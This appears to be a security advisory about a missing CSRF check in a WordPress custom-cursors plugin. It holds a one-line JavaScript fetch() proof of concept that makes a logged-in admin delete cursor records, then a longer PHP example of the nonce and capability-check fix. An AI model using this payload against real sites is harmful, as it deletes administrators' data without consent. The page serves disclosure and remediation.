The plugin does not have a CSRF check in place when deleting cursors, which could allow attackers to make a logged-in admin delete arbitrary cursors via a CSRF attack.
Make a logged-in admin open a page with the following JS code:

fetch('https://example.com/wp-admin/admin.php?page=wp_custom_cursors', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded' }), body: 'submit&delete_row=1' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

This will make them delete the cursor with ID 1.
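The fix for this class of bug is the standard WordPress nonce pattern: the delete form embeds a nonce with wp_nonce_field(), and the handler refuses any request that does not carry a valid one via check_admin_referer(). The following is an added example written for this page, not the plugin's own code; the page slug wp_custom_cursors and the delete_row parameter come from the advisory above, while the function names, the nonce action name, the capability and the table name are assumptions.

```php
<?php
// Added example, not code from the plugin. Names are hypothetical unless
// they appear in the advisory (page=wp_custom_cursors, delete_row).

/**
 * Handle a cursor-delete POST on the admin page.
 * Returns the deleted ID on success, 0 when no delete was requested.
 * On a missing/invalid nonce, check_admin_referer() calls wp_die() and
 * the request never reaches the delete.
 */
function wpcc_example_handle_delete() {
    if ( ! isset( $_POST['delete_row'] ) ) {
        return 0;
    }

    // 1. Authorization: only users who may manage options can delete.
    //    (Capability name is an assumption; use whatever the plugin requires.)
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'wpcc-example' ) );
    }

    // 2. CSRF protection: verify the '_wpnonce' field for this action.
    //    This is the check the advisory reports as missing. A cross-site
    //    POST cannot supply a valid value because the nonce is derived
    //    from the victim's own session and the action name.
    check_admin_referer( 'wpcc_delete_cursor' );

    $id = absint( wp_unslash( $_POST['delete_row'] ) );
    if ( $id === 0 ) {
        return 0;
    }

    global $wpdb;
    // Hypothetical table name; parameterised via $wpdb->delete().
    $wpdb->delete(
        $wpdb->prefix . 'wpcc_cursors',
        array( 'id' => $id ),
        array( '%d' )
    );

    return $id;
}

/**
 * Render a delete form for one cursor, with the nonce embedded.
 * wp_nonce_field() outputs the hidden '_wpnonce' input (plus
 * '_wp_http_referer') that check_admin_referer() later validates.
 */
function wpcc_example_delete_form( $cursor_id ) {
    $action_url = admin_url( 'admin.php?page=wp_custom_cursors' );
    ?>
    <form method="post" action="<?php echo esc_url( $action_url ); ?>">
        <?php wp_nonce_field( 'wpcc_delete_cursor' ); ?>
        <input type="hidden" name="delete_row" value="<?php echo esc_attr( absint( $cursor_id ) ); ?>">
        <?php submit_button( __( 'Delete', 'wpcc-example' ), 'delete', 'submit', false ); ?>
    </form>
    <?php
}

/**
 * Admin page callback (registered elsewhere with add_menu_page/add_submenu_page
 * under the slug 'wp_custom_cursors'). Process a delete first, then render.
 */
function wpcc_example_admin_page() {
    $deleted = wpcc_example_handle_delete();
    if ( $deleted > 0 ) {
        echo '<div class="notice notice-success"><p>'
            . esc_html( sprintf( __( 'Cursor %d deleted.', 'wpcc-example' ), $deleted ) )
            . '</p></div>';
    }
    // Example: show a delete form for cursor 1 (constructed sample ID).
    wpcc_example_delete_form( 1 );
}
```

With this in place, the request body from the proof of concept above (submit&delete_row=1, no _wpnonce field) fails check_admin_referer(), which stops the request with a nonce-failure message before any row is deleted. The capability check is kept separately because a nonce proves intent, not authorization: both are needed.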
Lana Codes
Lana Codes
Yes
2022-09-21 (about 8 months ago)
2022-09-21 (about 8 months ago)
2022-10-04 (about 7 months ago)